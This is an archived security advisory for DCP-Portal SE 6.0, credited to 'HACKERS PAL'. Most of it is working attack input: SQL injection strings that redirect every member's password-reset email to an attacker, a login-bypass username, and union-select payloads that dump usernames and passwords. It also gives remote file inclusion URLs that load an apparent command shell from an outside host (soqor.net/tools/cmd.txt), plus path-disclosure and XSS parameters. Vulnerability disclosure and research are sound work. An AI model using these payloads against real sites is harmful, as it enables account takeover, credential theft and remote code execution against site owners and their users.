TUCoPS :: Web :: CMS / Portals :: b06-4716.htm

DCP-Portal SE 6.0 multiple injections
DCP-Portal SE 6.0 multiple injections
DCP-Portal SE 6.0 multiple injections


Hello,,=0D
=0D
=0D
DCP-Portal SE  6.0  multiple injections=0D
=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
sql injections=0D
if magic_qoutes_gpc = off=0D
/*************************************/=0D
=0D
lostpassword.php=0D
=0D
you can recive the reset password email on your email for any user you want :)=0D
change youremail@yourserver.com to your real email=0D 
example :=0D
-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*=0D 
=0D
and you will recive email reset password for all the members in this website=0D
=0D
and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid=0D
=0D
-1' union select uid ,sex,name,surname,'youremail@yourserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*=0D 
=0D
---------------------------=0D
login=0D
try the user name as=0D
' or uid=1/*=0D
=0D
or change the uid value for any username you want log with=0D
---------------------------=0D
file calendar.php=0D
Sql injection by post method ,, try this form :)=0D
=0D

=0D
=0D
=0D

=0D
=0D
---------------------------=0D
file search.php=0D
=0D
try one of these ,, bcause the number of columns changes from section to another :)=0D
if you searched for (content,news,link,forum)=0D
use=0D
xx%') union select uid,username,password from dcp5_members/*=0D
=0D
if you searched for (doc,anns)=0D
use=0D
xx%') union select uid,username,password,password from dcp5_members/*=0D
/*************************************/=0D
=0D
Remote File including=0D
library/lib.php?root=http://www.soqor.net/tools/cmd.txt?=0D 
library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?=0D 
=0D
/*************************************/=0D
=0D
Fill path=0D
library/editor/editor.php=0D
library/lib.php=0D
=0D
/*************************************/=0D
=0D
Xss=0D
admin/inc/footer.inc.php?root_url="><"=0D
admin/inc/footer.inc.php?dcp_version==0D
=0D
admin/inc/header.inc.php?root_url="><"=0D
admin/inc/header.inc.php?page_top_name==0D
admin/inc/header.inc.php?page_name==0D
admin/inc/header.inc.php?page_options==0D
=0D
/*************************************/=0D
WwW.SoQoR.NeT

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH